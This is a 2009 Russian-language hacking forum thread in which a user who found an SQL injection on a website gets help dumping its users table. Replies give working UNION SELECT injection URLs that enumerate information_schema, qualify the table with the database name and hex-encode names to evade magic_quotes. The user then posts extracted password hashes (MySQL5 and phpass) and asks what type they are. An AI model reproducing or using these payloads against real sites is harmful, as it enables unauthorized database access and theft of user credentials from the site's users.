10.12.2009, 21:57
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
С нами:
8829763
Репутация:
131
|
|
Сообщение от R@X
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
25+from+table.db
или
25+from+db.table
точно не помню , мне Пашкелла как то описывал способ этот, благодарен ему)
|
|
|
10.12.2009, 22:00
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от R@X
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(schema_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.shemata--
перед users поставь базу через которую ета таблица работает, просто она там неодна...
ну типа db.user--
ЗЫЖ сам уродец...
Последний раз редактировалось 547; 10.12.2009 в 22:09..
|
|
|
|
10.12.2009, 21:45
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
2 .:[melkiy]:.
adduser
useradd
а вообще - http://ru-board.com/new/article.php?sid=112
|
|
|
|
10.12.2009, 22:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
DeluxeS:
не неси бред, такой хрени я не мог писать:
select+table_schema+from+information_schema.tables +where+table_name='users'--
и вот то, что выведет, и подставлять к users через точку, например вывело amx, значит итоговый правильный запрос такой:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+amx.users--
где amx - имя БД, где хранится таблица users
ЗЫЖ Вот уродец, ниже еще один
|
|
|
|
10.12.2009, 22:21
|
|
Новичок
Регистрация: 05.10.2008
Сообщений: 8
С нами:
9262575
Репутация:
0
|
|
спасибо парни помогли
еще вопрос что за хэш: *122FAB680F50DC0536FADEE85CB2974939BDD1A6
|
|
|
|
10.12.2009, 22:29
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от R@X
спасибо парни помогли
еще вопрос что за хэш: *122FAB680F50DC0536FADEE85CB2974939BDD1A6
mysql5 наверно.
|
|
|
|
10.12.2009, 22:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
даже интересно стало, кто тебе помог из парней - DeluxeS или 547? Т.е. на чьем примере из этих двух гениев получения имени БД ты достиг нужного результата?
Последний раз редактировалось Pashkela; 10.12.2009 в 22:28..
|
|
|
|
10.12.2009, 22:33
|
|
Новичок
Регистрация: 05.10.2008
Сообщений: 8
С нами:
9262575
Репутация:
0
|
|
Сообщение от Pashkela
даже интересно стало, кто тебе помог из парней - DeluxeS или 547? Т.е. на чьем примере из этих двух гениев получения имени БД ты достиг нужного результата?
по этому примеру смотрел:
Сообщение от Pashkela
DeluxeS:
не неси бред, такой хрени я не мог писать:
select+table_schema+from+information_schema.tables +where+table_name='users'--
и вот то, что выведет, и подставлять к users через точку, например вывело amx, значит итоговый правильный запрос такой:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+amx.users--
где amx - имя БД, где хранится таблица users
ЗЫЖ Вот уродец, ниже еще один
тока кавычки фильтрует базу пришлось в hex писать.
Еще раз спасибо всем 
|
|
|
|
10.12.2009, 22:39
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
тока кавычки фильтрует базу пришлось в hex писать.
Аллах Агбар, сам допер. И до остального допер бы тоже сам, если бы хоть раз досканально изучил подпись jokestera. Причем в течении 5 минут примерно
базу пришлось в hex писать.
не базу, а имя таблицы. Не фильтруются, а magic_quotes=ON
Последний раз редактировалось Pashkela; 10.12.2009 в 22:47..
|
|
|
|
10.12.2009, 23:15
|
|
Новичок
Регистрация: 05.10.2008
Сообщений: 8
С нами:
9262575
Репутация:
0
|
|
Сообщение от Pashkela
не базу, а имя таблицы. Не фильтруются, а magic_quotes=ON
Спасибо буду знать
а где это
сли бы хоть раз досканально изучил подпись jokestera. Причем в течении 5 минут примерно
подскажите плиз еще что это за хэш $P$BXnTLgitAWI18nma9N56AwYv/HbpUf0
вроде как и md5 но на web сервисах пишет что типа не правельный формат 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид
